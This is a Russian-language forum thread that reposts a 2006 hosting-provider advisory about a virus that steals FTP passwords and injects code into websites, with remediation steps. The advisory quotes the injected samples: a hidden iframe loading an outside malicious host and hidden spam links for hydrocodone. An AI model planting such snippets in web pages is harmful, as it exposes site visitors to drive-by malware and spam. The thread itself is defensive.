Внимание, важное собщение от хостера

Общие вопросы по работе портала, предложения и пожелания.

Модераторы: eXe.EG, Striker

Ответить
Аватара пользователя
Spectre
Добрый и отзывчивый
Сообщения: 253
Зарегистрирован: Пн июн 26, 2006 1:16

Внимание, важное собщение от хостера

Сообщение Spectre » Пт дек 15, 2006 14:49

----------------------------------------------------
Active Technologies

Уведомление об опасности распространения нового вируса
----------------------------------------------------

Уважаемые абоненты!

Сообщаем, что в сети интернет появился новый тип вируса - Downloader.JS.Psyme.ct
(возможны другия названия), распространяющий себя через веб-сайты.

Схема заражения довольно проста: достаточно зайти на зараженный
сайт и при стандартных настройках безопасности браузера, вирус
автоматически установится на компьютере пользователя.
После этого он начинает отслеживать логины и пароли от FTP,
высылая их злоумышленникам. Собрав определенное количество паролей,
запускается специальная программа, которая подключается по FTP
к каждому сайту и встраивает в начало или конец страниц собственный
html-код, например, такой:

<iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0
src=http://qufo.info/xc/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe-->

или

<u style=display:none><a href="http://www.streetsmarts.us/projects/med ... .html">buy hydrocodone</a>
<a href="http://www.streetsmarts.us/projects/med ... html">m367 hydrocodone</a></u>

Мы просим проверить свои сайты на предмет заражения. Для этого
достаточно п исходный код главной страницы на наличия постороннего текста.

В случае обнаружения следов вируса необходимо выполнить
следующие действия с обязательным соблюдением порядка:

1. Удалить вирусное содержимое со страниц вашего сайта.
2. Проверить локальный компьютер на наличие вирусов.
3. Зайти в панель управления хостинг-аккаунтом
и изменить пароль на пользователец FTP.

Обращаем внимание, что в интернете можно встретить обсуждение данной проблемы,
где в качестве причин заражения указываются различные бесплатные "движки"
(phpBB и т.д.), либо наличие уязвимостей у хостинг-провайдеров.
Со своей стороны можем заверить, что вирус распространяется только способом,
описанным в этом письме, и его появление не связано с проблемами безопасности
на сервере.

По всем возникающим вопросам, пожалуйста, обращайтесь
в службу поддержки: support@atservers.com

Желаем приятной работы!

--
Компания "Активные технологии"
http://www.atservers.com

----------------------------------------------------
Если вы не являетесь разработчиком/администратором,
пожалуйста, перешлите данное письмо соответствующему
сотруднику.

Получили письмо по ошибке?
Сообщите нам: list@atservers.com
----------------------------------------------------

Аватара пользователя
Миша Brom
activist
Сообщения: 136
Зарегистрирован: Пн июн 26, 2006 21:02

Сообщение Миша Brom » Вт дек 19, 2006 18:50

Во бля, пойду проверяться :znaika:

Аватара пользователя
Spectre
Добрый и отзывчивый
Сообщения: 253
Зарегистрирован: Пн июн 26, 2006 1:16

Сообщение Spectre » Чт дек 21, 2006 0:46

Все, за Мишу я теперь спокоен :)

Аватара пользователя
Spectre
Добрый и отзывчивый
Сообщения: 253
Зарегистрирован: Пн июн 26, 2006 1:16

Сообщение Spectre » Пн фев 12, 2007 13:49

В свете новой волны эпидемии (на этот раз Trojan-Downloader.HTML.Agent.c) и заражения сайта realsoft еще раз поднимаю эту тему.

Ответить

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и 1 гость